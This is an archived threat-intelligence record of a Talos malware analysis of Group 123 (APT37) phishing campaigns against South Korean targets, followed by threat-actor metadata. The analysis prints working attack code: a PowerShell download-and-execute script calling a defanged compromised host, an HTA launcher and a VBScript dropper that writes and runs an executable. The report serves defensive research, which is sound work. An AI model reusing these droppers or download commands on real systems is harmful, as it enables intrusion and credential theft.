{
	"id": "59e4ec36-9432-4984-aab3-b31fa30bb022",
	"created_at": "2026-04-06T00:18:40.830911Z",
	"updated_at": "2026-04-10T03:38:06.479674Z",
	"deleted_at": null,
	"sha1_hash": "7da818fc54818da4536f98203ef35f39940ca222",
	"title": "Korea In The Crosshairs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2658004,
	"plain_text": "Korea In The Crosshairs\r\nBy Paul Rascagneres\r\nPublished: 2018-01-16 · Archived: 2026-04-02 11:28:13 UTC\r\nThis blog post is authored by Warren Mercer and Paul Rascagneres and with contributions from Jungsoo An.\r\n A one year review of campaigns performed by an actor with multiple campaigns mainly linked to South Korean\r\ntargets.\r\nExecutive Summary\r\nThis article exposes the malicious activities of Group 123 during 2017. We assess\r\nwith high confidence that Group 123 was responsible for the following six\r\ncampaigns:\r\n\"Golden Time\" campaign.\r\n\"Evil New Year\" campaign.\r\n\"Are you Happy?\" campaign.\r\n\"FreeMilk\" campaign.\r\n\"North Korean Human Rights\" campaign.\r\n\"Evil New Year 2018\" campaign.\r\nOn January 2nd of 2018, the \"Evil New Year 2018\" was started. This campaign copies the approach of the\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 1 of 29\n\n2017 \"Evil New Year\" campaign.\r\nThe links between the different campaigns include shared code and compiler artifacts such as PDB (Program\r\nDataBase) patterns which were present throughout these campaigns.\r\nBased on our analysis, the \"Golden Time\", both \"Evil New Year\" and the \"North Korean Human Rights\"\r\ncampaigns specifically targeted South Korean users. The attackers used spear phishing emails combined with\r\nmalicious HWP documents created using Hancom Hangul Office Suite. Group 123 has been known to use exploits\r\n(such as CVE-2013-0808) or scripting languages harnessing OLE objects. The purpose of the malicious\r\ndocuments was to install and to execute ROKRAT, a remote administration tool (RAT). 
On occasion the attackers\r\ndirectly included the ROKRAT payload in the malicious document and during other campaigns the attackers\r\nleveraged multi-stage infection processes: the document only contained a downloader designed to download\r\nROKRAT from a compromised web server.\r\nAdditionally, the \"FreeMilk\" campaign targeted several non-Korean financial institutions. In this campaign, the\r\nattackers made use of a malicious Microsoft Office document, a deviation from their normal use of Hancom\r\ndocuments. This document exploited a newer vulnerability, CVE-2017-0199. Group 123 used this vulnerability\r\nless than one month after its public disclosure. During this campaign, the attackers used 2 different malicious\r\nbinaries: PoohMilk and Freenki. PoohMilk exists only to launch Freenki. Freenki is used to gather information\r\nabout the infected system and to download a subsequent stage payload. This malware was used in several\r\ncampaigns in 2016 and has some code overlap with ROKRAT.\r\nFinally, we identified a 6th campaign that is also linked to Group 123. We named this 6th campaign \"Are You\r\nHappy?\". In this campaign, the attackers deployed a disk wiper. The purpose of this attack was not only to gain\r\naccess to the remote infected systems but to also wipe the first sectors of the device. We identified that the wiper is\r\na ROKRAT module.\r\nThis actor was very active this year and continued to mainly focus on South Korea. The group leveraged spear\r\nphishing campaigns and malicious documents the contents of which included very specific language suggesting\r\nthat they were crafted by native Korean speakers rather than through the use of translation services. 
The actor has\r\nthe following demonstrated capabilities:\r\nTo include exploits (for Hangul and Microsoft Office) in its workflows.\r\nTo modify its campaigns by splitting the payload into multiple stages.\r\nTo use compromised web servers or legitimate cloud-based platforms.\r\nTo use HTTPS communications to make it harder to perform traffic analysis.\r\nTo compromise third parties to forge realistic spear phishing campaigns (for example, Yonsei University in the\r\n\"Golden Time\" campaign).\r\nTo constantly evolve; the new fileless capability added in 2018 is proof of this.\r\nThe Timeline\r\nHere is the timeline for 2017 and the beginning of 2018:\r\nAugust 2016 to March 2017: \"Golden Time\" Campaign\r\nAs with the majority of Group 123 campaigns, the initial attack vector during this\r\ncampaign was spear phishing. Talos identified two different kinds of emails. The\r\nfirst email we discovered was the most interesting. In this sample, we observed the\r\nattackers praising the user for joining a panel related to the \"Korean\r\nReunification and North Korean Conference\". The text in the email explained that\r\nthe recipient should complete the attached document to provide necessary\r\nfeedback. This appears to be a non-existent conference. The closest match we\r\nidentified related to any Unification conference was held in January 2017, which\r\nwas the NYDA Reunification conference. The sender was 'kgf2016@yonsei.ac.kr',\r\nwhich is the contact email of the Korea Global Forum, a separate conference.\r\nWhen we analyzed the email headers, we determined that the email was sent from an SMTP server using an IP\r\nassociated with the Yonsei University network. 
We believe that the email address was compromised and abused by\r\nthe attackers to send the email used in this campaign.\r\nThe filename for the malicious attachment translates as 'Unification North Korea Conference _ Examination\r\nDocuments', which reinforces the text in the email about the reunification conference. As an added bonus, in the\r\nbody of the email, the attacker even suggests that people who completed the document would get paid a 'small\r\nfee'. Perhaps the gift of embedded malware is the payment:\r\nMuch less effort was used to craft the second email Talos analyzed. The email was from a free Korean mail\r\nservice provided by Daum, Hanmail, indicating that there was no attempt to appear as if it originated from\r\nan official body or person, unlike the previous email described. The subject was simply 'Request Help' while the\r\nattachment filename was 'I'm a munchon person in Gangwon-do, North Korea'. We suspect the attacker was trying\r\nto generate sympathy by reminding the reader that Munchon and the province it is in, Kangwon, were part of a\r\nunified province that included South Korea's Gangwon-do prior to the division of Korea in 1945.\r\nThe second email contained a story about a person called 'Ewing Kim' who was looking for help:\r\nThe attachments of the two emails are two different HWP documents, both leveraging the same vulnerability (CVE-2013-0808).\r\nThis vulnerability targets the EPS (Encapsulated PostScript) format. The purpose of the shellcode is to download a\r\npayload from the Internet. 
The first email displays the following decoy document to the infected user and\r\ndownloads the following payload:\r\nhxxp://discgolfglow[.]com:/wp-content/plugins/maintenance/images/worker.jpg\r\nThe second email displays the following decoy document to the infected user and downloads the following\r\npayload:\r\nhxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpg\r\nIn both cases, the downloaded payload is the ROKRAT malware.\r\nThe first task of this variant of ROKRAT is to check the operating system version. If Windows XP is detected,\r\nthe malware executes an infinite loop. The purpose is to generate empty reports if opened on sandbox systems\r\nrunning Windows XP. Additionally, it checks whether common analysis tools are currently\r\nrunning on the infected system. If it detects the presence of these tools, the malware performs two network\r\nrequests to legitimate websites:\r\nhxxps://www[.]amazon[.]com/Men-War-PC/dp/B001QZGVEC/EsoftTeam/watchcom.jpg\r\nhxxp://www[.]hulu[.]com/watch/559035/episode3.mp4\r\nThe Amazon URL displays a WWII game called 'Men of War' while the Hulu URL attempts to stream a\r\nJapanese anime show called 'Golden Time':\r\nOne of the identifying characteristics of ROKRAT is the fact that it uses social network and cloud platforms to\r\ncommunicate with the attackers. These platforms are used to exfiltrate documents and receive instructions. Here is\r\na list of the platforms used by this variant: Twitter, Yandex and Mediafire. The tokens for each platform are\r\nhardcoded within the sample:\r\n\"Evil New Year\" Campaign\r\nThe documents sent to the targets were titled \"Analysis of 'Northern New Year in 2017'\" and used the official logo\r\nof the Korean Ministry of Unification. 
This is a simple choice for the actor to make, but it further shows their\r\nfamiliarity with the region.\r\nThe document claimed to discuss the New Year's activities of North Korea, and this would have been something\r\nthat the victims in South Korea would be very interested in. This would have been particularly true for\r\nGovernment targets, whom we believe to be Group 123's target of choice.\r\nThis document was a decoy aimed to entice the user to open malicious documents embedded further down the\r\npage.\r\nThe actor embedded two additional links, and the document urged the user to click on these links for more\r\ninformation about New Year's activities in North Korea. The first link was labeled as \"Comparison of Major Tasks\r\nin '16 \u0026 '17\" and the second link was identified as \"Comparison between '16 \u0026 '17\".\r\nUpon opening these links the user was presented with a further decoy Hangul document. This document was well\r\nwritten and further increases our confidence that we are dealing with a new Korean actor. 
These documents contained malicious OLE (Object Linking and Embedding) objects used to drop binaries, rather than\r\nthe EPS exploit seen in the \"Golden Time\" campaign.\r\nInitial analysis confirmed two similarly sized OLE object files within this document which appeared to be the\r\nsame from an execution point of view.\r\nThe two dropped binaries were stored and executed in this location during our analysis:\r\nC:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Hwp (2).exe\r\nC:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Hwp (3).exe\r\nInitial analysis showed some sloppy cleaning up from Group 123, which we used later to determine that\r\nseparate campaigns were the work of this same actor, as compilation artifacts remained within the binaries:\r\ne:\\Happy\\Work\\Source\\version 12\\T+M\\Result\\DocPrint.pdb\r\nThe second stage of the dropped binaries was used to execute wscript.exe while injecting shellcode into\r\nthis process. The shellcode is embedded within the resource 'BIN' and is used to unpack another PE32\r\nbinary and use wscript.exe to execute it. To do this, Group 123 uses a well-known technique that harnesses the\r\nVirtualAllocEx(), WriteProcessMemory() and CreateRemoteThread() Windows API calls.\r\nThe new PE32 unpacked from the shellcode is an initial reconnaissance malware which is used to communicate\r\nwith the C2 infrastructure to obtain the final payload. 
The information this malware collected included the\r\nfollowing:\r\nThe computer name\r\nThe username\r\nThe execution path of the sample\r\nThe BIOS model\r\nA randomly-generated ID to uniquely identify the system\r\nGroup 123 utilized this method to ensure their victim was (a) someone they wanted to target further and (b)\r\nsomeone they could infect further based on the information obtained from the reconnaissance phase.\r\nFurther network analysis showed that the binary attempted to connect to the following URLs:\r\nwww[.]kgls[.]or[.]kr/news2/news_dir/index.php\r\nwww[.]kgls[.]or[.]kr/news2/news_dir/02BC6B26_put.jpg\r\nKorean Government Legal Services (KGLS) is a legitimate Korean government body that manages Korean\r\ngovernment legal affairs. By compromising the KGLS, the attacker gained a trusted platform from which\r\nto execute an attack.\r\nThe initial network connection is to 'index.php'. This connection transmits the information gathered during the\r\nreconnaissance phase. The attacker then uses this information to determine the specific filename (based on the\r\nrandom ID) to serve to the infected victim. In our case this was 02BC6B26, which meant a file\r\n\"02BC6B26_put.jpg\" was created for us on the attacker's C2. This file is then dropped and renamed\r\n'officepatch.exe' on the victim's machine. Because the attacker was careful about who they attacked, we were\r\nunable to obtain this file during our analysis.\r\nDuring our investigation we were able to identify additional Command and Control infrastructure used by this\r\nactor. Four C2s were observed, based in the following countries:\r\n3 C2s in South Korea\r\n1 C2 in the Netherlands\r\nHere is a global map of the identified infrastructure:\r\nContrary to the previous campaign, the attackers separated the reconnaissance phase from the main ROKRAT\r\npayload. This trick was likely used to avoid detection. 
This is an interesting adaptation in Group 123's behavior.\r\nMarch 2017: \"Are You Happy?\" Campaign\r\nIn March 2017, Group 123 compiled a disk wiper. The malware contains a single\r\nfunction whose purpose is to open the drive of the infected system (\\\\.\\PhysicalDrive0)\r\nand write the following data to the MBR:\r\nYou can see the \"Are you Happy?\" string in the written buffer. After writing to the MBR, the malware reboots the\r\nmachine with the following command: c:\\windows\\system32\\shutdown /r /t 1\r\nAfter the reboot, the MBR displays the following string to the user:\r\nThe link to the other campaigns was the following PDB path:\nD:\\HighSchool\\version 13\\VC2008(Version15)\\T+M\\T+M\\TMProject\\Release\\ErasePartition.pdb\nAs you can see, it perfectly matches the ROKRAT PDB. This wiper is a ROKRAT module named\nERSP.enc. We assume that ERSP means ERaSePartition. This module can be downloaded and executed on\ndemand by Group 123.\nThis sample is interesting considering the attack in December 2014 against a Korean power plant, where the\nmessage displayed by the wiper was \"Who Am I?\".\nMay 2017: \"FreeMilk\" Campaign\nThis campaign targeted non-Korean financial institutions, but unlike the other\ncampaigns, this one does not use HWP documents. It instead uses Office\ndocuments. This change is because Group 123 did not target South Korea during\nthis campaign and Microsoft Office is standard in the rest of the world.\nInfection Vectors\nThe attackers exploited CVE-2017-0199 in order to download and execute a malicious HTA\ndocument inside of Microsoft Office. 
The URL used can be found in the embedded OLE object:\nhxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]\nHere is the source code of the downloaded HTA document:\nUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transiti\n\nSet v1ymUkaljYF = CreateObject(\"Scripting.FileSystemObject\")\r\nIf v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings(\"%PSModulePath%\") + \"..\\powershell.exe\") Then\r\nowFrClN0giJ.Run \"powershell -nop -windowstyle hidden -executionpolicy bypass -encodedcommand JABjAD0AbgBlAHcALQB\r\nowFrClN0giJ.Run \"cmd /c echo hta\u003e%tmp%\\webbrowser1094826604.tmp\", 0\r\nEnd If\r\nSelf.Close\r\n\u003c/script\u003e\r\n\u003chta:application\r\nid=\"oHTA\"\r\napplicationname=\"Bonjour\"\r\napplication=\"yes\"\r\n\u003e\r\n\u003c/head\u003e\r\n\u003c/html\u003e\r\nOnce decoded using the base64 algorithm, we are able to read the final payload:\r\n$c=new-object System.Net.WebClient\r\n$t =$env:temp\r\n$t1=$t+\"\\\\alitmp0131.jpg\"\r\n$t2=$t+\"\\\\alitmp0132.jpg\"\r\n$t3=$t+\"\\\\alitmp0133.js\"\r\ntry\r\n {\r\n echo $c.DownloadFile( \"hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg\",$t1)\r\n $c.DownloadFile( \"hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg\",$t2)\r\n $c.DownloadFile( \"hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp\",$t3)\r\n wscript.exe $t3\r\n }\r\ncatch\r\n {\r\n }\r\nThe purpose of this script is to download and execute a Windows script and two encoded payloads. 
The script is\r\nused to decode and execute the following payloads:\r\nAppach01.jpg (renamed: Windows-KB275122-x86.exe) is a Freenki sample.\r\nAppach02.jpg (renamed: Windows-KB271854-x86.exe) is a PoohMilk sample.\r\nPoohMilk Analysis\r\nThe PoohMilk sample is designed to perform two actions:\r\nCreate persistence to execute the Freenki sample at the next reboot.\r\nCheck for specific files on the infected machine.\r\nThe first action is to create a registry key in order to execute the Windows-KB275122-x86.exe file\r\npreviously downloaded. The file is executed with the argument \"help\". Here is the registry creation:\r\nThe registry location where persistence is achieved is:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Update. At the next reboot, the malware will\r\nbe executed.\r\nThe second action is to check if the file \"wsatra.tmp\" exists in the temporary directory of the current user. If this\r\nfile exists, its content is read in order to obtain a path to a second file with the LNK (link) extension. The\r\nLNK file is finally used to identify a third file: a ZIP file. The ZIP file is inflated in order to retrieve an RTF\r\ndocument, which is displayed to the infected user by executing Wordpad.\r\nHere is the PDB path from the PoohMilk sample:\r\nE:\\BIG_POOH\\Project\\milk\\Release\\milk.pdb\r\nFreenki Sample\r\nThe purpose of Freenki is to collect information on the infected system and to download a third\r\nexecutable.\r\nThis sample can be executed with 3 different arguments:\r\n\"Help\": the value configured by PoohMilk. 
In this context the main function is executed.\r\n\"Console\": with this argument, persistence is configured and the malware will be executed at the next\r\nreboot ( HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\runsample ).\r\n\"Sample\": with this argument, the malware executes the console command followed by the help command.\r\nThe information is collected using WMI queries:\r\nAdditionally, the malware lists the running processes via the Microsoft Windows API. The malware uses obfuscation\r\nin order to hide strings such as the URL or User-Agent; the algorithm is based on bitwise operations (SUB 0x0F, XOR 0x21).\r\nHere is the decoded data:\r\nhxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.php\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET\r\nCLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E;\r\nInfoPath.3)\r\nThe downloaded third payload is obfuscated using the same technique. The file is a fake image starting\r\nwith \"PNGF\".\r\nNovember 2017: \"North Korean Human Rights\" Campaign\r\nIn November 2017, Talos observed the latest Group 123 campaign of the year,\r\nwhich included a new version of ROKRAT being used in the latest wave of attacks.\r\nGroup 123 again used one of their main calling cards, the malicious HWP\r\ndocument. This time, Group 123 used a document containing information in\r\nrelation to a meeting held on 1st November in Seoul, South Korea. This document\r\nwas alleged to have been written by a legal representative claiming to be\r\nrepresenting the \"Citizens' Alliance For North Korean Human Rights And\r\nReunification Of Korean Peninsula\". 
Group 123 once again uses information\r\nrelated to Korean unification and now claims to highlight concerns\r\nrelated to human rights issues.\r\nThe document brought Talos a new gift - a new version of ROKRAT. Following on with the normal Group 123\r\nactivity, the document was written in perfect Korean text and dialect, again suggesting the origin of this group is\r\nthe Korean peninsula.\r\nFurther analysis of the document text allowed us to understand the context. The document mentions 'Community\r\nof North Korean human rights and unification' with the lawyer claiming to be part of the \"Citizen's Alliance for\r\nNorth Korean Human Rights and North-South unification\". The main purpose of this document was an attempt to\r\narrange a meeting to discuss items related to the \"North Korean Human Rights Act\" and \"Enactment of a Law\", which\r\nwas passed in 2016 in South Korea. We believe that the document was attempting to target stakeholders within the\r\n'올인통' community in an attempt to entice them to join the discussion and work on additional ideas\r\nrelated to these activities. The meeting was due to take place on November 1, 2017, and this document was trying\r\nto garner additional interest prior to the meeting.\r\nOnce again Group 123 leveraged the use of OLE objects within the HWP document. 
Analysis starts with a zlib\r\ndecompression (a standard action of HWP documents) and we're able to recover the following script:\r\nconst strEncode = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4A\r\nDIM outFile\r\nDIM base64Decoded\r\nDIM shell_obj\r\nSET shell_obj = CreateObject(\"WScript.Shell\")\r\nDIM fso\r\nSET fso = CreateObject(\"Scripting.FileSystemObject\")\r\noutFile = \"c:\\ProgramData\\HncModuleUpdate.exe\"\r\nbase64Decoded = decodeBase64(strEncode)\r\nIF NOT(fso.FileExists(outFile)) then\r\nwriteBytes outFile, base64Decoded\r\nshell_obj.run outFile\r\nEND IF\r\nWScript.Quit()\r\nprivate function decodeBase64(base64)\r\nDIM DM, EL\r\nSET DM = CreateObject(\"Microsoft.XMLDOM\")\r\nSET EL = DM.createElement(\"tmp\")\r\nEL.DataType = \"bin.base64\"\r\nEL.Text = base64\r\ndecodeBase64 = EL.NodeTypedValue\r\nend function\r\nprivate Sub writeBytes(file, bytes)\r\nDIM binaryStream\r\nSET binaryStream = CreateObject(\"ADODB.Stream\")\r\nbinaryStream.Type = 1\r\nbinaryStream.Open\r\nbinaryStream.Write bytes\r\nbinaryStream.SaveToFile file, 1\r\nEnd Sub\r\nThis script is executed and is used to decode a static base64 string held in the strEncode variable. The decoded\r\nbinary is stored as HncModuleUpdate.exe and is then executed. This is the ROKRAT\r\ndropper. Talos suspects the filename may have been selected to make it appear within running processes as a\r\npotential Hancom updater.\r\nThe dropper is used to extract a new resource named SBS. This specific resource contains malicious shellcode\r\nused by the malware. Additionally, we see a cmd.exe process launched and used for process injection using the\r\nVirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() Windows APIs; as with the first finding of\r\nROKRAT, they continue to use similar Windows APIs. 
The following graph view from IDA shows these steps.\r\nThese execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting it into\r\nthe cmd.exe process.\r\nOne of Group 123's oddities in this campaign was to drop the following picture as a decoy image to the user. This\r\nimage shows various publicly available images which look to be related to the Korean 'Independence Movement'\r\nand appear to be related to the Korean war.\r\nWe began performing further in-depth analysis on this new version of ROKRAT, and this is where we started to\r\nnotice some similarities with Group 123's \"Evil New Year\" campaign. The similarities are discussed later in this\r\npaper.\r\nThis ROKRAT variant contained anti-sandbox techniques. This is performed by checking if the following libraries\r\nare loaded on the victim machine:\r\nSbieDll.dll (Sandboxie library)\r\nDbghelp.dll (Microsoft debugging tools)\r\nApi_log.dll (ThreatAnalyzer / GFI SandBox)\r\nDir_watch.dll (ThreatAnalyzer / GFI SandBox)\r\nWe were able to uncover some other techniques used by this variant of ROKRAT to make analysis difficult: Group\r\n123 used an anti-debugging technique related to NOP (No Operation).\r\nnop dword ptr [eax+eax+00h] is a 5-byte NOP. 
But this opcode is not correctly supported by some debugging\r\ntools; Immunity Debugger, for example, will replace the assembly with \"???\" in red, making it difficult to\r\ndebug.\r\nThis version of ROKRAT came with a Browser Stealer mechanism which was similar, with a few modifications,\r\nto that used in the FreeMilk campaign using Freenki malware in 2016.\r\nGroup 123 continued their use of cloud platforms with this campaign, this time leveraging pCloud, Dropbox, Box\r\nand Yandex.\r\nFinally, here is the PDB of the sample used during this campaign:\r\nd:\\HighSchool\\version 13\\2ndBD\\T+M\\T+M\\Result\\DocPrint.pdb\r\nJanuary 2018: \"Evil New Year 2018\" Campaign\r\nAs we observed at the beginning of 2017, Group 123 started a campaign\r\ncorresponding with the new year in 2018. This campaign started on the 2nd of\r\nJanuary. The infection vector was a malicious HWP document:\r\nThis decoy document is an analysis of the 2018 New Year speech made by the leader of North Korea. The\r\napproach is exactly the same as what was seen in 2017, using a new decoy document. This document was alleged\r\nto have been written by the Ministry of Reunification, as demonstrated by the logo in the top left.\r\nSimilar to the \"Golden Time\" campaign, this document exploits an EPS vulnerability in order to download and\r\nexecute shellcode located on a compromised website:\r\nhxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.png\r\nThe fake image usage is a common pattern for this group. This image contains shellcode used to decode the\r\nembedded final payload: ROKRAT. This ROKRAT variant is loaded from memory. It's a fileless version of\r\nROKRAT. This behavior shows that Group 123 is constantly evolving to avoid detection. 
As usual, the ROKRAT sample uses cloud providers to communicate with the operator, this time leveraging Yandex, pCloud, Dropbox and\r\nBox.\r\nLinks Between Campaigns\r\nCode Sharing\r\nTalos has identified that Group 123 shares code between different malware families. Several features are\r\nshared in the samples mentioned in this article; however, we will cover only two here: the\r\nreconnaissance phase and the browser stealer.\r\nReconnaissance Phase\r\nThe ROKRAT samples used during the two \"Evil New Year\" campaigns and the \"North Korean Human Rights\"\r\ncampaign contained a reconnaissance phase. In the \"Evil New Year\" campaign the payload was split into\r\ntwo parts, the first of which contained the reconnaissance code. In the other campaign the reconnaissance phase\r\nwas directly included in the main payload. The code is the same.\r\nThe malware uses the following registry key to get the machine type:\r\nHKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData. The \"System manufacturer\" value is\r\nused to identify the type of machine. The code appears to be based on a forum post (rohitab.com) describing the\r\nuse of the Win32 APIs involved. 
The source code only considers the following machine types:\r\ndefault: lpString = \"(Other)\"; break;\r\ncase 0x02: lpString = \"(Unknown)\"; break;\r\ncase 0x03: lpString = \"(Desktop)\"; break;\r\ncase 0x04: lpString = \"(Low Profile Desktop)\"; break;\r\ncase 0x06: lpString = \"(Mini Tower)\"; break;\r\ncase 0x07: lpString = \"(Tower)\"; break;\r\ncase 0x08: lpString = \"(Portable)\"; break;\r\ncase 0x09: lpString = \"(Laptop)\"; break;\r\ncase 0x0A: lpString = \"(Notebook)\"; break;\r\ncase 0x0E: lpString = \"(Sub Notebook)\"; break;\r\nThe string format (with the parentheses) and the set of considered types are exactly the same as those used in the ROKRAT\r\nsamples.\r\nIt's interesting to note that this reconnaissance phase was not included in the ROKRAT variant used during the\r\n\"Golden Time\" campaign.\r\nBrowser Stealer\r\nFor the first time, the ROKRAT sample used during the \"North Korean Human Rights\" campaign contained a\r\nbrowser credentials stealer. The code used to perform this task is the same as that found in a Freenki\r\nsample deployed in 2016.\r\nThe malware is able to extract the stored passwords from Internet Explorer, Chrome and Firefox. For Chrome and\r\nFirefox, the malware queries the SQLite database containing the URL, username and password:\r\nAdditionally, it supports the Microsoft Vault mechanism. Vault was introduced in Windows 7; it contains the\r\nsensitive data (such as credentials) of Internet Explorer. Here is the initialization of the Vault APIs:\r\nOn the left, we have the ROKRAT sample and on the right the FreeMilk sample. 
You can see that in addition to\r\nthe code, the author copy-pasted English typos such as \"IE Registery\":\r\nPDB Paths\r\nWe can clearly identify a pattern in the PDB naming convention of all the binaries mentioned in\r\nthis article.\r\nROKRAT:\r\ne:\\Happy\\Work\\Source\\version 12\\T+M\\Result\\DocPrint.pdb (from the \"Evil New Year\" campaign)\r\nd:\\HighSchool\\version 13\\2ndBD\\T+M\\T+M\\Result\\DocPrint.pdb (from the \"North Korean Human\r\nRights\" campaign)\r\nD:\\HighSchool\\version 13\\First-Dragon(VS2015)\\Sample\\Release\\DogCall.pdb (ROKRAT sample from\r\nan unidentified campaign from June)\r\nWiper:\r\nD:\\HighSchool\\version 13\\VC2008(Version15)\\T+M\\T+M\\TMProject\\Release\\ErasePartition.pdb (from\r\nthe \"Are You Happy?\" campaign)\r\nSummary Graph\r\nHere is a graph to visualize the similarities and differences between each campaign\r\nmentioned in this article:\r\nConclusion\r\nSouth Korea is becoming an important target for malicious actors, and the\r\ntechniques used are becoming specific to the region (for example, the use of native\r\nlanguage to try and ensure the targets feel that the information, document or email\r\nbeing sent to them has added legitimacy). In a specific campaign, this actor took\r\ntime to compromise multiple legitimate Korean platforms, including Yonsei and the\r\nKGLS, in order to forge the spear phishing campaign or to host the command and\r\ncontrol. This approach is not common with less advanced actors and demonstrates\r\na high level of maturity and knowledge of the Korean region.\r\nHowever, Group 123's activities are not limited to South Korea. 
For international targets, they are able to switch to a more standard attack vector, such as Microsoft Office documents, as opposed to the HWP documents used when targeting victims located in Korea. Group 123 does not hesitate to use public exploits and scripting languages to drop and execute malicious payloads. We note that this group uses compromised legitimate websites (mainly WordPress) and cloud platforms to communicate with the infected systems. This approach makes it difficult to detect the communications through analysis of network flows. Even if the arsenal of this actor is diverse, we have identified some patterns: code copy-pasted from various public repositories and similarities between the different pieces of code. In addition to the Remote Administration Tools, we identified a wiper. We conclude that this group was involved in a campaign of intelligence gathering followed by attempted destruction.\r\nWith our current knowledge of this actor, we predict that they will not disappear anytime soon and will continue to be active during the coming years. Group 123 is constantly evolving, as the new fileless capability that was added to ROKRAT demonstrates. 
We also believe their target profile may change, but for now it will mostly focus on Korean peninsula targets; however, as explained, their capabilities will likely continue to evolve over time as they further refine their TTPs.\r\nIOCs\r\nSource: http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html"
	],
	"report_names": [
		"korea-in-crosshairs.html"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
